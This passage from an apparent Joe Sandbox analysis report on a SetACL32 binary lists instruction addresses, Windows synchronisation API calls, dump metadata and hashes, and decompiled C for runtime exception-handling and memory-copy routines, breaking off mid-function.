              0x012aa2e9
              0x012aa2ec
              0x012aa2ef
              0x012aa2f1
              0x012aa2f1
              0x012aa2f3
              0x012aa2f8
              0x012aa2fd
              0x012aa307
              0x012aa30c
              0x012aa30c
              0x012aa30f
              0x012aa311
              0x012aa3cf
              0x012aa3cf
              0x012aa3d1
              0x012aa466
              0x012aa469
              0x012aa46b
              0x012aa46d
              0x012aa471
              0x012aa473
              0x012aa475
              0x012aa475
              0x012aa47e
              0x012aa47e
              0x012aa489
              0x012aa497
              0x012aa4a1
              0x012aa4a6
              0x012aa4a9
              0x012aa4ad
              0x012aa4b0
              0x012aa4b2
              0x012aa4b8
              0x012aa4be
              0x012aa4c4
              0x012aa4c7
              0x012aa4dc
              0x012aa4dc
              0x012aa4de
              0x012aa4df
              0x012aa4e4
              0x012aa4e6
              0x012aa4e9
              0x012aa4ec
              0x012aa4f4
              0x012aa4c9
              0x012aa4c9
              0x012aa4c9
              0x012aa4fb
              0x012aa500
              0x012aa506
              0x012aa50b
              0x012aa50e
              0x012aa510
              0x012aa516
              0x012aa51c
              0x012aa522
              0x012aa525
              0x012aa53a
              0x012aa53a
              0x012aa53c
              0x012aa53d
              0x012aa542
              0x012aa544
              0x012aa547
              0x012aa54a
              0x012aa552
              0x012aa527
              0x012aa527
              0x012aa527
              0x012aa559
              0x012aa561
              0x012aa564
              0x012aa569
              0x012aa56c
              0x012aa570
              0x012aa574
              0x012aa576
              0x012aa579
              0x012aa57b
              0x012aa57e
              0x012aa583
              0x012aa583
              0x012aa57b
              0x012aa586
              0x012aa58a
              0x012aa595
              0x012aa59c
              0x012aa5a0
              0x012aa5a4
              0x012aa5b1
              0x012aa5b6
              0x012aa5be
              0x012aa5c3
              0x012aa5cd
              0x012aa5d5
              0x012aa5d8
              0x012aa5dd
              0x012aa5e0
              0x012aa5e6
              0x012aa5e9
              0x00000000
              0x012aa5ef
              0x012aa5ef
              0x012aa5f7
              0x012aa5fd
              0x012aa5ff
              0x00000000
              0x012aa605
              0x012aa605
              0x012aa60b
              0x012aa60e
              0x012aa610
              0x012aa659
              0x012aa659
              0x00000000
              0x012aa612
              0x012aa612
              0x012aa61c
              0x012aa61c
              0x012aa622
              0x012aa62a
              0x012aa62c
              0x012aa632
              0x012aa635
              0x012aa63b
              0x012aa643
              0x012aa649
              0x012aa64b
              0x012aa651
              0x012aa65f
              0x012aa665
              0x012aa665
              0x012aa667
              0x012aa670
              0x012aa685
              0x012aa685
              0x012aa68b
              0x012aa68f
              0x012aa692
              0x012aa6a7
              0x012aa6ad
              0x012aa6af
              0x012aa6b4
              0x012aa6ba
              0x012aa6c1
              0x012aa6c7
              0x012aa6ce
              0x012aa6ce
              0x012aa6af
              0x012aa64b
              0x012aa614
              0x012aa614
              0x012aa61a
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012aa61a
              0x012aa612
              0x012aa610
              0x012aa5ff
              0x012aa6dc
              0x012aa6dd
              0x012aa6e3
              0x012aa6e6
              0x012aa6ec
              0x012aa6f2
              0x012aa6f4
              0x012aa6fa
              0x012aa6fe
              0x012aa707
              0x012aa709
              0x012aa70b
              0x012aa70f
              0x012aa711
              0x012aa713
              0x012aa713
              0x012aa718
              0x012aa71c
              0x012aa71c
              0x012aa721
              0x012aa725
              0x012aa72a
              0x012aa72d
              0x012aa730
              0x012aa733
              0x012aa73f
              0x012aa742
              0x012aa74e
              0x012aa753
              0x012aa744
              0x012aa744
              0x012aa749
              0x012aa749
              0x012aa735
              0x012aa735
              0x012aa73a
              0x012aa73a
              0x012aa756
              0x012aa75f
              0x012aa763
              0x012aa77c
              0x012aa782
              0x012aa784
              0x012aa786
              0x012aa786
              0x012aa784
              0x012aa6fe
              0x012aa6f4
              0x012aa78e
              0x012aa793
              0x012aa796
              0x012aa79b
              0x012aa79e
              0x00000000
              0x012aa3d7
              0x012aa3d7
              0x012aa3da
              0x012aa3e4
              0x012aa3e7
              0x00000000
              0x012aa3ed
              0x012aa3ed
              0x012aa3f1
              0x012aa3f3
              0x012aa3f3
              0x012aa408
              0x012aa40d
              0x012aa414
              0x012aa41b
              0x012aa41e
              0x012aa423
              0x012aa428
              0x012aa42c
              0x012aa42f
              0x012aa432
              0x00000000
              0x012aa434
              0x012aa434
              0x012aa437
              0x012aa43e
              0x012aa440
              0x012aa446
              0x012aa45c
              0x012aa45c
              0x012aa45e
              0x012aa463
              0x00000000
              0x012aa448
              0x012aa448
              0x012aa44b
              0x012aa453
              0x012aa456
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012aa456
              0x012aa446
              0x012aa432
              0x012aa3e7
              0x012aa317
              0x012aa322
              0x012aa329
              0x012aa336
              0x012aa33c
              0x012aa346
              0x012aa35b
              0x012aa367
              0x012aa36c
              0x012aa36f
              0x012aa372
              0x012aa3a6
              0x012aa3ac
              0x012aa3b0
              0x012aa3b5
              0x012aa3bc
              0x012aa3bf
              0x012aa3c7
              0x012aa3cc
              0x00000000
              0x012aa374
              0x012aa374
              0x012aa377
              0x012aa37e
              0x012aa380
              0x012aa386
              0x012aa39c
              0x012aa39c
              0x012aa39e
              0x012aa3a3
              0x00000000
              0x012aa388
              0x012aa388
              0x012aa38b
              0x012aa393
              0x012aa396
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012aa396
              0x012aa386
              0x012aa372
              0x012aa1f9
              0x012aa202
              0x012aa207
              0x012aa20e
              0x012aa213
              0x012aa216
              0x012aa219
              0x012aa24d
              0x012aa24d
              0x012aa257
              0x012aa25c
              0x00000000
              0x012aa21b
              0x012aa21b
              0x012aa21e
              0x012aa225
              0x012aa227
              0x012aa22d
              0x012aa243
              0x012aa243
              0x012aa245
              0x012aa24a
              0x00000000
              0x012aa22f
              0x012aa22f
              0x012aa232
              0x012aa23a
              0x012aa23d
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012aa23d
              0x012aa22d
              0x012aa219
              0x012aa1f7
              0x012aa1d6
              0x012aa1db
              0x012aa1df
              0x00000000
              0x012aa1df
              0x012aa13a
              0x012aa13c
              0x012aa141
              0x012aa144
              0x012aa146
              0x012aa14d
              0x012aa151
              0x012aa156
              0x012aa159
              0x012aa159
              0x012aa15c
              0x012aa15f
              0x012aa164
              0x012aa16b
              0x012aa16d
              0x012aa174
              0x012aa17f
              0x012aa184
              0x012aa184
              0x012aa187
              0x012aa18a
              0x012aa18d
              0x012aa1c1
              0x012aa1c7
              0x012aa1c7
              0x012aa1ca
              0x00000000
              0x012aa18f
              0x012aa18f
              0x012aa192
              0x012aa199
              0x012aa19b
              0x012aa1a1
              0x012aa1b7
              0x012aa1b7
              0x012aa1b9
              0x012aa1be
              0x00000000
              0x012aa1a3
              0x012aa1a3
              0x012aa1a6
              0x012aa1ae
              0x012aa1b1
              0x012aa7d8
              0x012aa7d8
              0x012aa7dd
              0x012aa7dd
              0x012aa7f0
              0x012aa7f4
              0x012aa7fa
              0x012aa7fa
              0x012aa7fc
              0x012aa7a0
              0x012aa7a0
              0x012aa7a1
              0x012aa7a1
              0x00000000
              0x012aa7fe
              0x012aa7fe
              0x012aa7fe
              0x012aa800
              0x012aa7a4
              0x012aa7a4
              0x012aa7a6
              0x012aa7a8
              0x012a9e42
              0x012a9e42
              0x012a9e42
              0x00000000
              0x012a9e42
              0x012aa802
              0x012aa802
              0x012aa804
              0x012aa80c
              0x012aa80d
              0x012aa814
              0x012aa815
              0x012aa816
              0x012aa817
              0x012aa818
              0x012aa819
              0x012aa81a
              0x012aa81b
              0x012aa81c
              0x012aa81d
              0x012aa81e
              0x012aa81f
              0x012aa820
              0x012aa821
              0x012aa823
              0x012aa826
              0x012aa829
              0x012aa85d
              0x012aa85f
              0x012aa866
              0x012aa86d
              0x012aa871
              0x012aa874
              0x012aa877
              0x012aa8ab
              0x012aa8ad
              0x012aa8b4
              0x012aa8bb
              0x012aa8bf
              0x012aa8c2
              0x012aa8c5
              0x012aa8f5
              0x012aa8f7
              0x012aa8fe
              0x012aa905
              0x012aa909
              0x012aa90c
              0x012aa90f
              0x012aa93e
              0x012aa93e
              0x012aa940
              0x012aa947
              0x012aa94e
              0x012aa952
              0x012aa911
              0x012aa911
              0x012aa913
              0x012aa91a
              0x012aa920
              0x012aa934
              0x012aa934
              0x012aa936
              0x00000000
              0x012aa922
              0x012aa922
              0x012aa925
              0x012aa92d
              0x012aa930
              0x00000000
              0x012aa932
              0x012aa932
              0x00000000
              0x012aa932
              0x012aa930
              0x012aa920
              0x012aa8c7
              0x012aa8c7
              0x012aa8ca
              0x012aa8d1
              0x012aa8d7
              0x012aa8eb
              0x012aa8eb
              0x012aa8ed
              0x012aa8f2
              0x00000000
              0x012aa8d9
              0x012aa8d9
              0x012aa8dc
              0x012aa8e4
              0x012aa8e7
              0x00000000
              0x012aa8e9
              0x012aa8e9
              0x00000000
              0x012aa8e9
              0x012aa8e7
              0x012aa8d7
              0x012aa879
              0x012aa879
              0x012aa87c
              0x012aa883
              0x012aa889
              0x012aa8a1
              0x012aa8a1
              0x012aa8a3
              0x012aa8a8
              0x00000000
              0x012aa88b
              0x012aa88b
              0x012aa88e
              0x012aa896
              0x012aa899
              0x00000000
              0x012aa89f
              0x012aa89f
              0x00000000
              0x012aa89f
              0x012aa899
              0x012aa889
              0x012aa82b
              0x012aa82b
              0x012aa82e
              0x012aa835
              0x012aa83b
              0x012aa853
              0x012aa853
              0x012aa855
              0x012aa85a
              0x00000000
              0x012aa83d
              0x012aa83d
              0x012aa840
              0x012aa848
              0x012aa84b
              0x012aa953
              0x012aa953
              0x012aa958
              0x012aa959
              0x012aa95a
              0x012aa95b
              0x012aa95c
              0x012aa95d
              0x012aa95e
              0x012aa95f
              0x012aa960
              0x012aa961
              0x012aa963
              0x012aa966
              0x012aa968
              0x012aa987
              0x012aa98f
              0x012aa994
              0x012aa995
              0x012aa996
              0x012aa997
              0x012aa998
              0x012aa999
              0x012aa99a
              0x012aa99b
              0x012aa99c
              0x012aa99d
              0x012aa99e
              0x012aa99f
              0x012aa9a0
              0x012aa9a3
              0x012aa9a4
              0x012aa9ab
              0x012aa9b1
              0x012aa9b3
              0x012aa9b5
              0x012aa9b7
              0x012aa9c2
              0x012aa9c4
              0x012aa9cb
              0x012aa9ce
              0x012aa9d0
              0x012aa9d2
              0x012aa9d5
              0x012aa9d5
              0x012aa9d8
              0x012aa9db
              0x012aa9de
              0x012aa9e1
              0x012aa9e3
              0x012aa9e3
              0x012aa9e8
              0x012aa9f1
              0x012aa9fa
              0x012aa9fa
              0x012aaa02
              0x012aa96a
              0x012aa96a
              0x012aa971
              0x012aa979
              0x012aa97c
              0x012aa97c
              0x012aa851
              0x012aa851
              0x00000000
              0x012aa851
              0x012aa84b
              0x012aa83b
              0x012aa829
              0x012aa800
              0x00000000
              0x00000000
              0x00000000
              0x012aa1b1
              0x012aa1a1
              0x012aa18d
              0x012aa134
              0x012a9fea
              0x012a9fed
              0x00000000
              0x012a9fed
              0x012a9fe8
              0x012a9eae
              0x012a9eae
              0x012a9ebd
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a9ebd
              0x00000000
              0x012a9ea8
              0x012a9ec3
              0x012a9ec9
              0x012a9efd
              0x012a9efd
              0x012a9f00
              0x012a9f02
              0x012a9f09
              0x012a9f10
              0x012a9f17
              0x012a9f4e
              0x012a9f4e
              0x012a9f54
              0x012a9f88
              0x012a9f88
              0x012a9f8e
              0x012aa7bc
              0x012aa7bf
              0x012aa7c7
              0x012aa7c8
              0x012aa7c9
              0x012aa7d7
              0x012a9f94
              0x012a9f94
              0x012a9f97
              0x012a9f9e
              0x012a9fa6
              0x012aa7b2
              0x012aa7b2
              0x012aa7b4
              0x00000000
              0x012a9fac
              0x012a9fac
              0x012a9faf
              0x012a9fba
              0x00000000
              0x012a9fc0
              0x00000000
              0x012a9fc0
              0x012a9fba
              0x012a9fa6
              0x012a9f56
              0x012a9f56
              0x012a9f59
              0x012a9f60
              0x012a9f68
              0x012a9f7e
              0x012a9f7e
              0x012a9f80
              0x012a9f85
              0x00000000
              0x012a9f6a
              0x012a9f6a
              0x012a9f6d
              0x012a9f78
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a9f78
              0x012a9f68
              0x012a9f19
              0x012a9f19
              0x012a9f1f
              0x012a9f26
              0x012a9f2e
              0x012a9f44
              0x012a9f44
              0x012a9f46
              0x012a9f4b
              0x00000000
              0x012a9f30
              0x012a9f30
              0x012a9f33
              0x012a9f3e
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a9f3e
              0x012a9f2e
              0x012a9ecb
              0x012a9ecb
              0x012a9ece
              0x012a9ed5
              0x012a9edd
              0x012a9ef3
              0x012a9ef3
              0x012a9ef5
              0x012a9efa
              0x00000000
              0x012a9edf
              0x012a9edf
              0x012a9ee2
              0x012a9eed
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a9eed
              0x012a9edd
              0x00000000
              0x012a9ec9

              APIs
              • WaitForSingleObject.KERNEL32(?,000000FF,EDD8D3B4,?,?,0130B6D4), ref: 012A9E94
              • ReleaseMutex.KERNEL32(?), ref: 012A9EA4
              • ResetEvent.KERNEL32(?), ref: 012A9FC8
              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 012A9FD9
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: ObjectSingleWait$EventMutexReleaseReset
              • String ID:
              • API String ID: 4195719913-0
              • Opcode ID: dd7ccac35dab7e338159b74c63e7a8f1ee66924096e870d8d6ce03b8d12568ac
              • Instruction ID: 09ee49911b8e2958cdee13022379192fde2d63b0e5bc9f7a52bdf393bcb171f4
              • Opcode Fuzzy Hash: dd7ccac35dab7e338159b74c63e7a8f1ee66924096e870d8d6ce03b8d12568ac
              • Instruction Fuzzy Hash: B961AD3092025ADFDF25CFA9C984B9DBBF1FF09314F604269D508AB690D734A994CF90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012CC6A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
              Download Yara Rule
              C-Code - Quality: 45%
              			E012CC6A0(void* __ebx, void* __ecx, intOrPtr __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				void* _v36;
				void* _v40;
				char* __edi;
				intOrPtr* __esi;
				int _t150;
				signed int _t157;
				intOrPtr _t158;
				void* _t159;
				intOrPtr* _t160;
				intOrPtr _t162;
				void* _t165;
				signed int _t167;
				void _t175;
				void _t176;
				int _t178;
				unsigned int _t179;
				int _t180;
				int _t191;
				intOrPtr* _t195;
				intOrPtr _t196;
				signed int _t200;
				char _t202;
				int _t206;
				unsigned int _t207;
				int _t208;
				int _t210;
				int _t215;
				signed int _t226;
				unsigned int _t230;
				int _t231;
				int _t233;
				signed int _t239;
				void* _t240;
				intOrPtr _t241;
				void* _t243;
				signed int _t251;
				intOrPtr _t258;
				void* _t260;
				void* _t263;
				void* _t264;
				void* _t265;
				intOrPtr* _t267;
				int _t271;
				void* _t275;
				void* _t277;
				void* _t287;

				_t221 = __edx;
				_t195 = _a4;
				_push(_t240);
				_v5 = 0;
				_v16 = 1;
				 *_t195 = E012E765C(__ecx,  *_t195);
				_t196 = _a8;
				_t6 = _t196 + 0x10; // 0x11
				_t258 = _t6;
				_push(_t258);
				_v20 = _t258;
				_v12 =  *(_t196 + 8) ^  *0x1309018;
				E012CC660(_t196, __edx, _t240, _t258,  *(_t196 + 8) ^  *0x1309018);
				E012CECFC(_a12);
				_t150 = _a4;
				_t277 = _t275 - 0x1c + 0x10;
				_t241 =  *((intOrPtr*)(_t196 + 0xc));
				if(( *(_t150 + 4) & 0x00000066) != 0) {
					__eflags = _t241 - 0xfffffffe;
					if(_t241 != 0xfffffffe) {
						_t221 = 0xfffffffe;
						E012CEE80(_t196, 0xfffffffe, _t258, 0x1309018);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t150;
					_v28 = _a12;
					 *((intOrPtr*)(_t196 - 4)) =  &_v32;
					if(_t241 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t200 = _v12;
							_t157 = _t241 + (_t241 + 2) * 2;
							_t196 =  *((intOrPtr*)(_t200 + _t157 * 4));
							_t158 = _t200 + _t157 * 4;
							_t201 =  *((intOrPtr*)(_t158 + 4));
							_v24 = _t158;
							if( *((intOrPtr*)(_t158 + 4)) == 0) {
								_t202 = _v5;
								goto L7;
							} else {
								_t221 = _t258;
								_t159 = E012CEE20(_t201, _t258);
								_t202 = 1;
								_v5 = 1;
								_t287 = _t159;
								if(_t287 < 0) {
									_v16 = 0;
									L13:
									_push(_t258);
									E012CC660(_t196, _t221, _t241, _t258, _v12);
									goto L14;
								} else {
									if(_t287 > 0) {
										_t160 = _a4;
										__eflags =  *_t160 - 0xe06d7363;
										if( *_t160 == 0xe06d7363) {
											__eflags =  *0x12ef6b8;
											if(__eflags != 0) {
												_t191 = E012E5D70(__eflags, 0x12ef6b8);
												_t277 = _t277 + 4;
												__eflags = _t191;
												if(_t191 != 0) {
													_t271 =  *0x12ef6b8; // 0x12cc3bb
													 *0x12ee308(_a4, 1);
													 *_t271();
													_t258 = _v20;
													_t277 = _t277 + 8;
												}
												_t160 = _a4;
											}
										}
										_t222 = _t160;
										E012CEE60(_t160, _a8, _t160);
										_t162 = _a8;
										__eflags =  *((intOrPtr*)(_t162 + 0xc)) - _t241;
										if( *((intOrPtr*)(_t162 + 0xc)) != _t241) {
											_t222 = _t241;
											E012CEE80(_t162, _t241, _t258, 0x1309018);
											_t162 = _a8;
										}
										_push(_t258);
										 *((intOrPtr*)(_t162 + 0xc)) = _t196;
										E012CC660(_t196, _t222, _t241, _t258, _v12);
										E012CEE40();
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t241);
										_push(_t258);
										_t260 = _v36;
										_t206 = _v32;
										_t243 = _v40;
										_t165 = _t260 + _t206;
										__eflags = _t243 - _t260;
										if(_t243 <= _t260) {
											L25:
											__eflags = _t206 - 0x20;
											if(_t206 < 0x20) {
												L96:
												_t207 = _t206 & 0x0000001f;
												__eflags = _t207;
												if(_t207 != 0) {
													_t167 = _t207;
													_t208 = _t207 >> 2;
													__eflags = _t208;
													while(_t208 != 0) {
														 *_t243 =  *_t260;
														_t243 = _t243 + 4;
														_t260 = _t260 + 4;
														_t208 = _t208 - 1;
														__eflags = _t208;
													}
													_t210 = _t167 & 0x00000003;
													__eflags = _t210;
													while(_t210 != 0) {
														 *_t243 =  *_t260;
														_t260 = _t260 + 1;
														_t243 = _t243 + 1;
														_t210 = _t210 - 1;
														__eflags = _t210;
													}
												}
												goto L102;
											} else {
												__eflags = _t206 - 0x80;
												if(__eflags >= 0) {
													asm("bt dword [0x130ad68], 0x1");
													if(__eflags >= 0) {
														__eflags = (_t243 ^ _t260) & 0x0000000f;
														if(__eflags != 0) {
															L33:
															asm("bt dword [0x130ad68], 0x0");
															if(__eflags >= 0) {
																goto L58;
															} else {
																__eflags = _t243 & 0x00000003;
																if((_t243 & 0x00000003) != 0) {
																	goto L58;
																} else {
																	__eflags = _t260 & 0x00000003;
																	if(__eflags == 0) {
																		asm("bt edi, 0x2");
																		if(__eflags < 0) {
																			_t176 =  *_t260;
																			_t206 = _t206 - 4;
																			__eflags = _t206;
																			_t260 = _t260 + 4;
																			 *_t243 = _t176;
																			_t243 = _t243 + 4;
																		}
																		asm("bt edi, 0x3");
																		if(__eflags < 0) {
																			asm("movq xmm1, [esi]");
																			_t206 = _t206 - 8;
																			__eflags = _t206;
																			_t260 = _t260 + 8;
																			asm("movq [edi], xmm1");
																			_t243 = _t243 + 8;
																		}
																		__eflags = _t260 & 0x00000007;
																		if(__eflags == 0) {
																			asm("movdqa xmm1, [esi-0x8]");
																			_t263 = _t260 - 8;
																			do {
																				asm("movdqa xmm3, [esi+0x10]");
																				_t206 = _t206 - 0x30;
																				asm("movdqa xmm0, [esi+0x20]");
																				asm("movdqa xmm5, [esi+0x30]");
																				_t263 = _t263 + 0x30;
																				__eflags = _t206 - 0x30;
																				asm("movdqa xmm2, xmm3");
																				asm("palignr xmm3, xmm1, 0x8");
																				asm("movdqa [edi], xmm3");
																				asm("movdqa xmm4, xmm0");
																				asm("palignr xmm0, xmm2, 0x8");
																				asm("movdqa [edi+0x10], xmm0");
																				asm("movdqa xmm1, xmm5");
																				asm("palignr xmm5, xmm4, 0x8");
																				asm("movdqa [edi+0x20], xmm5");
																				_t243 = _t243 + 0x30;
																			} while (_t206 >= 0x30);
																			_t260 = _t263 + 8;
																		} else {
																			asm("bt esi, 0x3");
																			if(__eflags >= 0) {
																				asm("movdqa xmm1, [esi-0x4]");
																				_t264 = _t260 - 4;
																				do {
																					asm("movdqa xmm3, [esi+0x10]");
																					_t206 = _t206 - 0x30;
																					asm("movdqa xmm0, [esi+0x20]");
																					asm("movdqa xmm5, [esi+0x30]");
																					_t264 = _t264 + 0x30;
																					__eflags = _t206 - 0x30;
																					asm("movdqa xmm2, xmm3");
																					asm("palignr xmm3, xmm1, 0x4");
																					asm("movdqa [edi], xmm3");
																					asm("movdqa xmm4, xmm0");
																					asm("palignr xmm0, xmm2, 0x4");
																					asm("movdqa [edi+0x10], xmm0");
																					asm("movdqa xmm1, xmm5");
																					asm("palignr xmm5, xmm4, 0x4");
																					asm("movdqa [edi+0x20], xmm5");
																					_t243 = _t243 + 0x30;
																				} while (_t206 >= 0x30);
																				_t260 = _t264 + 4;
																				while(1) {
																					L51:
																					__eflags = _t206 - 0x10;
																					if(__eflags < 0) {
																						break;
																					}
																					asm("movdqu xmm1, [esi]");
																					_t206 = _t206 - 0x10;
																					_t260 = _t260 + 0x10;
																					asm("movdqa [edi], xmm1");
																					_t243 = _t243 + 0x10;
																				}
																				asm("bt ecx, 0x2");
																				if(__eflags < 0) {
																					_t175 =  *_t260;
																					_t206 = _t206 - 4;
																					__eflags = _t206;
																					_t260 = _t260 + 4;
																					 *_t243 = _t175;
																					_t243 = _t243 + 4;
																				}
																				asm("bt ecx, 0x3");
																				if(__eflags < 0) {
																					asm("movq xmm1, [esi]");
																					__eflags = _t206;
																					_t260 = _t260 + 8;
																					asm("movq [edi], xmm1");
																					_t243 = _t243 + 8;
																				}
																				goto __eax;
																			}
																			asm("movdqa xmm1, [esi-0xc]");
																			_t265 = _t260 - 0xc;
																			do {
																				asm("movdqa xmm3, [esi+0x10]");
																				_t206 = _t206 - 0x30;
																				asm("movdqa xmm0, [esi+0x20]");
																				asm("movdqa xmm5, [esi+0x30]");
																				_t265 = _t265 + 0x30;
																				__eflags = _t206 - 0x30;
																				asm("movdqa xmm2, xmm3");
																				asm("palignr xmm3, xmm1, 0xc");
																				asm("movdqa [edi], xmm3");
																				asm("movdqa xmm4, xmm0");
																				asm("palignr xmm0, xmm2, 0xc");
																				asm("movdqa [edi+0x10], xmm0");
																				asm("movdqa xmm1, xmm5");
																				asm("palignr xmm5, xmm4, 0xc");
																				asm("movdqa [edi+0x20], xmm5");
																				_t243 = _t243 + 0x30;
																			} while (_t206 >= 0x30);
																			_t260 = _t265 + 0xc;
																		}
																		goto L51;
																	}
																}
															}
															goto L60;
														} else {
															asm("bt dword [0x1309030], 0x1");
															if(__eflags < 0) {
																_t178 = _t260 & 0x0000000f;
																__eflags = _t178;
																if(_t178 != 0) {
																	_push(_t206 - 0x10);
																	_t179 = 0x10 - _t178;
																	_t215 = _t179 & 0x00000003;
																	__eflags = _t215;
																	while(_t215 != 0) {
																		 *_t243 =  *_t260;
																		_t260 = _t260 + 1;
																		_t243 = _t243 + 1;
																		_t215 = _t215 - 1;
																		__eflags = _t215;
																	}
																	_t180 = _t179 >> 2;
																	__eflags = _t180;
																	while(_t180 != 0) {
																		 *_t243 =  *_t260;
																		_t260 = _t260 + 4;
																		_t243 = _t243 + 4;
																		_t180 = _t180 - 1;
																		__eflags = _t180;
																	}
																	_pop(_t206);
																}
																_t230 = _t206;
																_t206 = _t206 & 0x0000007f;
																_t231 = _t230 >> 7;
																__eflags = _t231;
																while(_t231 != 0) {
																	asm("movdqa xmm0, [esi]");
																	asm("movdqa xmm1, [esi+0x10]");
																	asm("movdqa xmm2, [esi+0x20]");
																	asm("movdqa xmm3, [esi+0x30]");
																	asm("movdqa [edi], xmm0");
																	asm("movdqa [edi+0x10], xmm1");
																	asm("movdqa [edi+0x20], xmm2");
																	asm("movdqa [edi+0x30], xmm3");
																	asm("movdqa xmm4, [esi+0x40]");
																	asm("movdqa xmm5, [esi+0x50]");
																	asm("movdqa xmm6, [esi+0x60]");
																	asm("movdqa xmm7, [esi+0x70]");
																	asm("movdqa [edi+0x40], xmm4");
																	asm("movdqa [edi+0x50], xmm5");
																	asm("movdqa [edi+0x60], xmm6");
																	asm("movdqa [edi+0x70], xmm7");
																	_t260 = _t260 + 0x80;
																	_t243 = _t243 + 0x80;
																	_t231 = _t231 - 1;
																	__eflags = _t231;
																}
																goto L92;
															} else {
																goto L33;
															}
														}
													} else {
														memcpy(_t243, _t260, _t206);
														return _v40;
													}
												} else {
													asm("bt dword [0x1309030], 0x1");
													if(__eflags < 0) {
														L92:
														__eflags = _t206;
														if(_t206 != 0) {
															_t233 = _t206 >> 5;
															__eflags = _t233;
															if(_t233 != 0) {
																do {
																	asm("movdqu xmm0, [esi]");
																	asm("movdqu xmm1, [esi+0x10]");
																	asm("movdqu [edi], xmm0");
																	asm("movdqu [edi+0x10], xmm1");
																	_t260 = _t260 + 0x20;
																	_t243 = _t243 + 0x20;
																	_t233 = _t233 - 1;
																	__eflags = _t233;
																} while (_t233 != 0);
															}
															goto L96;
														}
														L102:
														return _v40;
													} else {
														L58:
														__eflags = _t243 & 0x00000003;
														while((_t243 & 0x00000003) != 0) {
															 *_t243 =  *_t260;
															_t206 = _t206 - 1;
															_t260 = _t260 + 1;
															_t243 = _t243 + 1;
															__eflags = _t243 & 0x00000003;
														}
														L60:
														_t226 = _t206;
														__eflags = _t206 - 0x20;
														if(_t206 < 0x20) {
															goto L96;
														} else {
															memcpy(_t243, _t260, _t206 >> 2 << 2);
															switch( *((intOrPtr*)((_t226 & 0x00000003) * 4 +  &M012CCA64))) {
																case 0:
																	return _v40;
																	goto L108;
																case 1:
																	 *__edi =  *__esi;
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
																case 2:
																	 *__edi =  *__esi;
																	_t92 = __esi + 1; // 0xc0330cc4
																	 *((char*)(__edi + 1)) =  *_t92;
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
																case 3:
																	 *__edi =  *__esi;
																	 *((char*)(__edi + 1)) =  *((intOrPtr*)(__esi + 1));
																	 *((char*)(__edi + 2)) =  *((intOrPtr*)(__esi + 2));
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
															}
														}
													}
												}
											}
										} else {
											__eflags = _t243 - _t165;
											if(_t243 < _t165) {
												_t267 = _t260 + _t206;
												_t251 = _t243 + _t206;
												__eflags = _t206 - 0x20;
												if(__eflags < 0) {
													L83:
													__eflags = _t206 & 0xfffffffc;
													while((_t206 & 0xfffffffc) != 0) {
														_t251 = _t251 - 4;
														_t267 = _t267 - 4;
														 *_t251 =  *_t267;
														_t206 = _t206 - 4;
														__eflags = _t206 & 0xfffffffc;
													}
													__eflags = _t206;
													if(_t206 != 0) {
														do {
															_t251 = _t251 - 1;
															_t267 = _t267 - 1;
															 *_t251 =  *_t267;
															_t206 = _t206 - 1;
															__eflags = _t206;
														} while (_t206 != 0);
													}
													return _v40;
												} else {
													asm("bt dword [0x1309030], 0x1");
													if(__eflags < 0) {
														__eflags = _t251 & 0x0000000f;
														if((_t251 & 0x0000000f) != 0) {
															do {
																_t206 = _t206 - 1;
																_t267 = _t267 - 1;
																_t251 = _t251 - 1;
																 *_t251 =  *_t267;
																__eflags = _t251 & 0x0000000f;
															} while ((_t251 & 0x0000000f) != 0);
															while(1) {
																L79:
																__eflags = _t206 - 0x80;
																if(_t206 < 0x80) {
																	break;
																}
																_t267 = _t267 - 0x80;
																_t251 = _t251 - 0x80;
																asm("movdqu xmm0, [esi]");
																asm("movdqu xmm1, [esi+0x10]");
																asm("movdqu xmm2, [esi+0x20]");
																asm("movdqu xmm3, [esi+0x30]");
																asm("movdqu xmm4, [esi+0x40]");
																asm("movdqu xmm5, [esi+0x50]");
																asm("movdqu xmm6, [esi+0x60]");
																asm("movdqu xmm7, [esi+0x70]");
																asm("movdqu [edi], xmm0");
																asm("movdqu [edi+0x10], xmm1");
																asm("movdqu [edi+0x20], xmm2");
																asm("movdqu [edi+0x30], xmm3");
																asm("movdqu [edi+0x40], xmm4");
																asm("movdqu [edi+0x50], xmm5");
																asm("movdqu [edi+0x60], xmm6");
																asm("movdqu [edi+0x70], xmm7");
																_t206 = _t206 - 0x80;
																__eflags = _t206 & 0xffffff80;
																if((_t206 & 0xffffff80) != 0) {
																	continue;
																}
																break;
															}
															__eflags = _t206 - 0x20;
															if(_t206 >= 0x20) {
																do {
																	_t267 = _t267 - 0x20;
